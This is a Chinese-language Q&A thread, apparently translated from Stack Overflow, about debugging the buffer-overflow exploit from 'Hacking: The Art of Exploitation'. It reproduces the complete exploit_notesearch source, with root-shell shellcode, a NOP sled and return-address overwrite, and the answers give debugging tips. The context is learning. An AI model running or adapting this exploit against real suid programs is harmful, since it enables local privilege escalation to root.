黑客攻击 - 剥削的艺术:调试缓冲区溢出示例

时间:2013-08-13 18:27:32

标签: c linux overflow exploit

我正在读“黑客 - 剥削的艺术”一书。 堆栈缓冲区溢出有一个例子。

这是受攻击程序来源的一部分,“notesearch”:

char searchstring[100];
// ...
if(argc > 1)                      
    strcpy(searchstring, argv[1]);   // <-- no length check

以下是攻击程序的来源,“exploit_notesearch”:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

   strcat(command, "\'");
   // <-- dumping full command string here
   system(command); // run exploit
   free(command);
}

当运行exploit_notesearch时,一切正常,我会得到一个root shell,因为notesearch程序具有suid权限。 命令字符串包含要调用的程序的名称,NOP sled,shellcode和shellcode的返回地址。

我想用gdb调试被利用的程序,看看漏洞利用是如何工作的。 为此,我将命令字符串(在调用system()之前)转储到一个文件中(让我们称之为dump.txt)。 然后从shell尝试获得相同的结果,我直接使用dumped命令字符串作为参数调用被利用的程序。

提示&GT; $(cat dump.txt)

notesearch程序启动了,但是我没有root shell,而是出现了分段错误。 我还通过剧本在很宽的范围内改变了回报地址。

我的问题,有什么区别:

  • 通过shell开始notesearch

  • 通过系统启动notesearch

也许你也知道通过gdb调试被利用程序的另一种方法。

2 个答案:

答案 0 :(得分:2)

搞定了: 在notesearch程序的main开头添加了以下行,它们睡眠时间为45秒:

#ifdef MY_DEBUG
printf("child running - sleep()\n");
fflush(stdout);
sleep(45);
printf("child running - sleep() finished\n");
#endif

然后我启动exploit_notesearch,它本身启动notesearch,现在等待45s。 在另一个shell中,我列出了所有正在运行的进程以获取notesearch进程的PID。 然后我运行gdb,附加到这个进程,然后可以在调试器中观察漏洞。

答案 1 :(得分:-1)

exploit_notesearch.c中,返回地址是参考变量i计算的,该变量在exploit_notesearch.c的main函数中声明

所以命令字符串现在包含返回地址 w.r.t 到变量 i。当你将命令字符串输出到文件然后直接用./notesearch <command>

执行时

这个返回地址可能指的是当前notesearch程序无法访问的内存位置,因此是段错误。